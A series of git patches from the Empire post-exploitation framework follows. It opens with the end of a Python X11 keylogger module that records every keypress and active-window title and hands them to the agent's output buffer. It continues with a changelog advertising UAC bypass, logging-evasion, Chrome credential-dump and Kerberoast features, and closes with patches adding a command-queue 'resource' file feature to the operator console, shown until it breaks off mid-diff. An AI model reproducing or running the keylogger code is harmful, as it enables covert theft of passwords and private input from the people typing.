ct.pointer(XkbMinorVersion), + ct.pointer(XkbReasonReturn) + ) + +def get_active_window(): + window = ct.c_ulong() + dw = ct.c_int() + + if not ( x11.XGetInputFocus( + display, ct.pointer(window), ct.pointer(dw) + ) and window ): + return + + return window + +def get_window_title(window): + if not window: + return + + hint = ClassHint() + if x11.XGetClassHint(display, window, ct.pointer(hint)): + return hint.name + +def get_window_name(window): + prop = XTextProperty() + x11.XGetWMName(display, window, ct.pointer(prop)) + state = ct.c_char_p("WM_STATE") + onlyifexist = ct.c_bool(False) + atom = x11.XInternAtom(display, state, False) + refs = (ct.byref(ct.c_ulong()), ct.byref(ct.c_int()), ct.byref(ct.c_ulong())) + buf_len = ct.c_ulong() + buf = ct.c_char_p() + x11.XGetWindowProperty(display, window, atom, 0, 0, False, + 0, refs[0], refs[1], refs[2], + ct.byref(buf_len), ct.byref(buf)) + if buf.value is None: + root_return, parent_return, children_return, nchildren_return = (ct.byref(ct.c_ulong()), ct.pointer(ct.c_ulong()), ct.pointer(ct.c_ulong()), ct.c_uint()) + x11.XQueryTree(display, window, root_return, parent_return, children_return, ct.pointer(nchildren_return)) + x11.XGetWMName(display, parent_return.contents, ct.pointer(prop)) + return prop.value + + +def get_active_window_title(): + return get_window_title(get_active_window()) + +def append_key_buff(k): + if k: + window = get_active_window() + if str(append_key_buff.last_window) != str(window): + job_message_buffer("\\n%s: %s\\n"%(strftime("%d-%m-%Y %H:%M:%S"), \ + get_window_name(window))) + append_key_buff.last_window = window + job_message_buffer(k) + +append_key_buff.last_window = None + +def poll(callback, sleep_interval=.01): + while not stopped: + sleep(sleep_interval) + released, group, level = fetch_keys_poll() + callback(to_keysyms(released, group, level)) + +def xinput(callback): + if not xi: + raise NotAvailable() + + xi_opcode = ct.c_int() + xi_event = ct.c_int() + xi_error = ct.c_int() + + if not x11.XQueryExtension( + display, + 'XInputExtension', + ct.pointer(xi_opcode), ct.pointer(xi_event), ct.pointer(xi_error) + ): + return NotAvailable() + + root_win = x11.XDefaultRootWindow(display) + job_message_buffer(str(root_win)) + eventmask = XiEventMask() + eventmask.deviceid = 0 + eventmask.mask_len = XiMaxLen() + + mask = (ct.c_byte*eventmask.mask_len)() + XiSetMask(mask, 2) # KeyPress + eventmask.mask = ct.cast(ct.pointer(mask), ct.c_void_p) + xi.XISelectEvents(display, root_win, ct.cast(ct.pointer(eventmask), ct.c_void_p), 1) + x11.XMapWindow(display, root_win) + x11.XSync(display, 0) + while not stopped: + event = XEvent() + x11.XNextEvent(display, ct.pointer(event)) + x11.XGetEventData(display, ct.pointer(event.cookie)) + if event.cookie.type == 35 and event.cookie.extension == xi_opcode.value: + xievent = ct.cast(event.cookie.data, ct.POINTER(XIDeviceEvent)).contents + callback(to_keysyms( + [xievent.detail], + xievent.group.effective, + xievent.mods.effective + )) + + x11.XFreeEventData(display, ct.pointer(event.cookie)) + + x11.XDestroyWindow(display, root_win) + +def run(): + try: + xinput(append_key_buff) + except NotAvailable: + job_message_buffer("poll") + poll(append_key_buff) + except: + import traceback + job_message_buffer("Exception\\n"+traceback.format_exc()) + +def stop(): + stopped = True + +def dump(): + res = u''.join(buffer) + buffer = [] + return res + +def fetch_keys_poll(): + state = XkbState() + x11.XkbGetState(display, 0x0100, ct.pointer(state)) + + group = ord(state.group) + level = ord(state.locked_mods) & 1 + + keyboard = ct.c_buffer(32) + x11.XQueryKeymap(display, keyboard) + current = set() + + for byte, value in enumerate(keyboard): + value = ord(value) + if not value: + continue + + for bit in xrange(8): + if value & (1 << bit): + current.add(byte*8 + bit) + + released = set(x for x in state if not x in current and x) + + state = current + group, group = group, group + level, level = level, level + + return released, group, level + +def to_keysyms(released, group, level): + keys = set() + + for k in set(released): + # We incorrectly guess level here, but in 99% real life cases shift means level1 + # Also some things may not be available in group, so fallback to default one + ks = x11.XkbKeycodeToKeysym(display, k, group, level) + if not ks: + ks = x11.XkbKeycodeToKeysym(display, k, 0, level) + if not ks: + ks = x11.XkbKeycodeToKeysym(display, k, 0, 0) + + if ((ks >> 8) & 0xFF) == 0xFE or ks in (0xffe2, 0xffe3, 0xffe5, 0xffe6): + # Ignore group shifts and shift key info + continue + + uks = keysym_to_unicode(ks) + xk = keysym_to_XK(ks) + if xk: + keys.add(u'<{}>'.format(xk)) + elif uks: + keys.add(uks) + elif ks: + keys.add(u'{{{}}}'.format(ks)) + + return u''.join(keys) +run() + +x = 0 +while x < 4: + sleep(6) + job_message_buffer('test '+str(x)+'\\n') + x += 1 +job_message_buffer('[!] Keylogger exited\\n') + +""" + + return script From 97cf473cb78aa0561aee4ea1df6b03cd042e070d Mon Sep 17 00:00:00 2001 From: Chris Ross Date: Thu, 12 Oct 2017 14:58:36 -0400 Subject: [PATCH 03/50] Update changelog --- changelog | 43 ++++++++++++++++++++++--------------------- 1 file changed, 22 insertions(+), 21 deletions(-) diff --git a/changelog b/changelog index c59d199..be9d61f 100644 --- a/changelog +++ b/changelog @@ -1,25 +1,26 @@ -Running +10/12/2017 -------- -- Update crontab to work hourly #667 -- Update keylogger to log to disk on server side by @clr2of8 -- Fix macro launcher #681 -- Fixes vbscript string literal quoting. #702 -- Add option to host a stager payload in the http listener @424f424f -- Add @enigma0x3 Token Manipulation script as a BypassUAC module @424f424f -- Hide true host name when using domain fronting #730 @clr2of8 -- Fixed custom proxy config in launcher code #728 @dirkjanm -- generate_upload function added to Stagers #722 @hightopfade -- Aes kerberoast #725 @elitest -- DBX Improvements (SOCKS, Hide window via WindowHandler) #721 @IljaSchumacher -- Improved ScriptBlock logging bypasses #740 @cobbr_io -- Slack Integration - Notification for new Agents #737 @dchrastil -- Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers -- Fix Eternal Blue Issue #656 -- Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663 -- Fix Macro syntax error per @utkusen issue #664 -- Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr -- Fix creds manual add parsing with whitespace in password -- Fix validate length parameter attribute for Invoke-PSInject.ps1d +- Version 2.2 Master Release + - Update crontab to work hourly #667 + - Update keylogger to log to disk on server side by @clr2of8 + - Fix macro launcher #681 + - Fixes vbscript string literal quoting. #702 + - Add option to host a stager payload in the http listener @424f424f + - Add @enigma0x3 Token Manipulation script as a BypassUAC module @424f424f + - Hide true host name when using domain fronting #730 @clr2of8 + - Fixed custom proxy config in launcher code #728 @dirkjanm + - generate_upload function added to Stagers #722 @hightopfade + - Aes kerberoast #725 @elitest + - DBX Improvements (SOCKS, Hide window via WindowHandler) #721 @IljaSchumacher + - Improved ScriptBlock logging bypasses #740 @cobbr_io + - Slack Integration - Notification for new Agents #737 @dchrastil + - Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers + - Fix Eternal Blue Issue #656 + - Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663 + - Fix Macro syntax error per @utkusen issue #664 + - Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr + - Fix creds manual add parsing with whitespace in password + - Fix validate length parameter attribute for Invoke-PSInject.ps1d 8/28/2017 -------- From 000f81519d4a97e2eba3ab628b2ea76556ec039b Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 14:17:35 -0600 Subject: [PATCH 04/50] initial resource command working, but hard coded --- lib/common/empire.py | 72 +++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 71 insertions(+), 1 deletion(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 6d7aa5d..719f718 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -96,7 +96,7 @@ class MainMenu(cmd.Cmd): dispatcher.send('[*] Empire starting up...', sender="Empire") - + self.resourceQueue = [] # print the loading menu messages.loading() @@ -271,6 +271,9 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n" print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" + if self.resourceQueue and len(self.resourceQueue) > 0: + self.cmdqueue = [self.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) @@ -377,10 +380,18 @@ class MainMenu(cmd.Cmd): # CMD methods ################################################### + def postcmd(self, stop, line): + if self.resourceQueue and len(self.resourceQueue) > 0: + self.cmdqueue = [self.resourceQueue.pop(0)] + + + def default(self, line): "Default handler." pass + def do_resource(self, line): + self.resourceQueue = ["listeners","uselistener http","set Name http81","set DefaultProfile some/default/profile,some/other,and/one/more", "set Host 1.2.3.4","set Port 81","info","execute","back","?","?","agents","back","listeners","uselistener http","set Name http82","set Port 82","execute","listeners","kill http81","kill http82"] def do_exit(self, line): "Exit Empire" @@ -391,6 +402,8 @@ class MainMenu(cmd.Cmd): "Jump to the Agents menu." try: agents_menu = AgentsMenu(self) + if self.resourceQueue and len(self.resourceQueue) > 0: + agents_menu.cmdqueue = [self.resourceQueue.pop(0)] agents_menu.cmdloop() except Exception as e: raise e @@ -400,6 +413,8 @@ class MainMenu(cmd.Cmd): "Interact with active listeners." try: listener_menu = ListenersMenu(self) + if self.resourceQueue and len(self.resourceQueue) > 0: + listener_menu.cmdqueue.append(self.resourceQueue.pop(0)) listener_menu.cmdloop() except Exception as e: raise e @@ -416,6 +431,8 @@ class MainMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self, parts[0]) + if self.resourceQueue and len(self.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -424,6 +441,8 @@ class MainMenu(cmd.Cmd): else: self.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self, parts[0]) + if self.resourceQueue and len(self.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") @@ -441,6 +460,8 @@ class MainMenu(cmd.Cmd): else: try: module_menu = ModuleMenu(self, line) + if self.resourceQueue and len(self.resourceQueue) > 0: + module_menu.cmdqueue.append(self.resourceQueue.pop(0)) module_menu.cmdloop() except Exception as e: raise e @@ -921,6 +942,10 @@ class AgentsMenu(cmd.Cmd): def emptyline(self): pass + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + self.cmdqueue = [nextcmd] def do_back(self, line): "Go back to the main menu." @@ -1283,6 +1308,8 @@ class AgentsMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -1291,6 +1318,8 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in AgentsMenu's do_userstager()") @@ -1307,6 +1336,8 @@ class AgentsMenu(cmd.Cmd): else: # set agent to "all" module_menu = ModuleMenu(self.mainMenu, line, agent="all") + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -1419,9 +1450,13 @@ class AgentMenu(cmd.Cmd): if agentLanguage.lower() == 'powershell': agent_menu = PowerShellAgentMenu(mainMenu, sessionID) + if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: + agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() elif agentLanguage.lower() == 'python': agent_menu = PythonAgentMenu(mainMenu, sessionID) + if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: + agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() else: print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) @@ -1532,6 +1567,9 @@ class PowerShellAgentMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -1881,6 +1919,8 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -1989,6 +2029,8 @@ class PowerShellAgentMenu(cmd.Cmd): module.options['ProcessID']['Value'] = pid module_menu = ModuleMenu(self.mainMenu, 'powershell/code_execution/invoke_shellcode') + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2046,6 +2088,8 @@ class PowerShellAgentMenu(cmd.Cmd): # jump to the spawn module module_menu = ModuleMenu(self.mainMenu, "powershell/management/spawn") + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2331,6 +2375,9 @@ class PythonAgentMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -2679,6 +2726,8 @@ class PythonAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2839,6 +2888,10 @@ class ListenersMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + self.cmdqueue = [nextcmd] def do_agents(self, line): "Jump to the Agents menu." @@ -2893,6 +2946,8 @@ class ListenersMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -2901,6 +2956,8 @@ class ListenersMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in ListenerMenu's do_userstager()") @@ -2915,6 +2972,8 @@ class ListenersMenu(cmd.Cmd): print helpers.color("[!] Error: invalid listener module") else: listenerMenu = ListenerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + listenerMenu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) listenerMenu.cmdloop() @@ -3044,6 +3103,9 @@ class ListenerMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -3286,6 +3348,9 @@ class ModuleMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -3393,6 +3458,8 @@ class ModuleMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, line, agent=self.module.options['Agent']['Value']) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -3655,6 +3722,9 @@ class StagerMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." From 083cffd27e55e7f8a2f9c1b565ee3e273240c4c8 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 14:42:43 -0600 Subject: [PATCH 05/50] cleaner code for resource files, but still hardcoded --- lib/common/empire.py | 70 +++++++++++++++++++++----------------------- 1 file changed, 33 insertions(+), 37 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 719f718..340579b 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -392,6 +392,7 @@ class MainMenu(cmd.Cmd): def do_resource(self, line): self.resourceQueue = ["listeners","uselistener http","set Name http81","set DefaultProfile some/default/profile,some/other,and/one/more", "set Host 1.2.3.4","set Port 81","info","execute","back","?","?","agents","back","listeners","uselistener http","set Name http82","set Port 82","execute","listeners","kill http81","kill http82"] + #self.resourceQueue = ["agents","?","?"] def do_exit(self, line): "Exit Empire" @@ -402,8 +403,6 @@ class MainMenu(cmd.Cmd): "Jump to the Agents menu." try: agents_menu = AgentsMenu(self) - if self.resourceQueue and len(self.resourceQueue) > 0: - agents_menu.cmdqueue = [self.resourceQueue.pop(0)] agents_menu.cmdloop() except Exception as e: raise e @@ -413,8 +412,6 @@ class MainMenu(cmd.Cmd): "Interact with active listeners." try: listener_menu = ListenersMenu(self) - if self.resourceQueue and len(self.resourceQueue) > 0: - listener_menu.cmdqueue.append(self.resourceQueue.pop(0)) listener_menu.cmdloop() except Exception as e: raise e @@ -431,8 +428,6 @@ class MainMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self, parts[0]) - if self.resourceQueue and len(self.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -441,8 +436,6 @@ class MainMenu(cmd.Cmd): else: self.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self, parts[0]) - if self.resourceQueue and len(self.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") @@ -460,8 +453,6 @@ class MainMenu(cmd.Cmd): else: try: module_menu = ModuleMenu(self, line) - if self.resourceQueue and len(self.resourceQueue) > 0: - module_menu.cmdqueue.append(self.resourceQueue.pop(0)) module_menu.cmdloop() except Exception as e: raise e @@ -938,6 +929,10 @@ class AgentsMenu(cmd.Cmd): self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) self.stdout.write("\n") + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) def emptyline(self): pass @@ -1308,8 +1303,6 @@ class AgentsMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -1318,8 +1311,6 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in AgentsMenu's do_userstager()") @@ -1336,8 +1327,6 @@ class AgentsMenu(cmd.Cmd): else: # set agent to "all" module_menu = ModuleMenu(self.mainMenu, line, agent="all") - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -1450,18 +1439,13 @@ class AgentMenu(cmd.Cmd): if agentLanguage.lower() == 'powershell': agent_menu = PowerShellAgentMenu(mainMenu, sessionID) - if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: - agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() elif agentLanguage.lower() == 'python': agent_menu = PythonAgentMenu(mainMenu, sessionID) - if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: - agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() else: print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) - class PowerShellAgentMenu(cmd.Cmd): """ The main class used by Empire to drive an individual 'agent' menu. @@ -1492,6 +1476,10 @@ class PowerShellAgentMenu(cmd.Cmd): # listen for messages from this specific agent dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any) + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) # def preloop(self): # traceback.print_stack() @@ -1919,8 +1907,6 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2029,8 +2015,6 @@ class PowerShellAgentMenu(cmd.Cmd): module.options['ProcessID']['Value'] = pid module_menu = ModuleMenu(self.mainMenu, 'powershell/code_execution/invoke_shellcode') - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2088,8 +2072,6 @@ class PowerShellAgentMenu(cmd.Cmd): # jump to the spawn module module_menu = ModuleMenu(self.mainMenu, "powershell/management/spawn") - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2327,6 +2309,10 @@ class PythonAgentMenu(cmd.Cmd): if results: print "\n" + results.rstrip('\r\n') + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) # def preloop(self): # traceback.print_stack() @@ -2726,8 +2712,8 @@ class PythonAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) +## if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: +## module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2865,6 +2851,11 @@ class ListenersMenu(cmd.Cmd): # display all active listeners on menu startup messages.display_active_listeners(self.mainMenu.listeners.activeListeners) + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) + # def preloop(self): # traceback.print_stack() @@ -2946,8 +2937,6 @@ class ListenersMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -2956,8 +2945,6 @@ class ListenersMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in ListenerMenu's do_userstager()") @@ -2972,8 +2959,6 @@ class ListenersMenu(cmd.Cmd): print helpers.color("[!] Error: invalid listener module") else: listenerMenu = ListenerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - listenerMenu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) listenerMenu.cmdloop() @@ -3091,6 +3076,10 @@ class ListenerMenu(cmd.Cmd): # set the text prompt self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > ' + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) def emptyline(self): """ @@ -3278,6 +3267,11 @@ class ModuleMenu(cmd.Cmd): except Exception as e: print helpers.color("[!] ModuleMenu() init error: %s" % (e)) + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) + # def preloop(self): # traceback.print_stack() @@ -3458,8 +3452,6 @@ class ModuleMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, line, agent=self.module.options['Agent']['Value']) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -3684,6 +3676,10 @@ class StagerMenu(cmd.Cmd): listener = self.mainMenu.listeners.get_listener(listener) self.stager.options['Listener']['Value'] = listener + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) def validate_options(self): "Make sure all required stager options are completed." From 4bf47277e7d4ee429a7d218a2a4e4c95ff0553d5 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 15:45:07 -0600 Subject: [PATCH 06/50] using append instead of extend, and reading resource file --- lib/common/empire.py | 45 ++++++++++++++++++++++---------------------- 1 file changed, 22 insertions(+), 23 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 340579b..4584aba 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -272,7 +272,7 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" if self.resourceQueue and len(self.resourceQueue) > 0: - self.cmdqueue = [self.resourceQueue.pop(0)] + self.cmdqueue.append(self.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) @@ -382,7 +382,7 @@ class MainMenu(cmd.Cmd): def postcmd(self, stop, line): if self.resourceQueue and len(self.resourceQueue) > 0: - self.cmdqueue = [self.resourceQueue.pop(0)] + self.cmdqueue.append(self.resourceQueue.pop(0)) @@ -390,9 +390,10 @@ class MainMenu(cmd.Cmd): "Default handler." pass - def do_resource(self, line): - self.resourceQueue = ["listeners","uselistener http","set Name http81","set DefaultProfile some/default/profile,some/other,and/one/more", "set Host 1.2.3.4","set Port 81","info","execute","back","?","?","agents","back","listeners","uselistener http","set Name http82","set Port 82","execute","listeners","kill http81","kill http82"] - #self.resourceQueue = ["agents","?","?"] + def do_resource(self, arg): + self.resourceQueue = [] + with open(arg) as f: + self.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire" @@ -931,7 +932,7 @@ class AgentsMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def emptyline(self): @@ -939,8 +940,7 @@ class AgentsMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - nextcmd = self.mainMenu.resourceQueue.pop(0) - self.cmdqueue = [nextcmd] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_back(self, line): "Go back to the main menu." @@ -1478,7 +1478,7 @@ class PowerShellAgentMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): @@ -1557,7 +1557,7 @@ class PowerShellAgentMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + 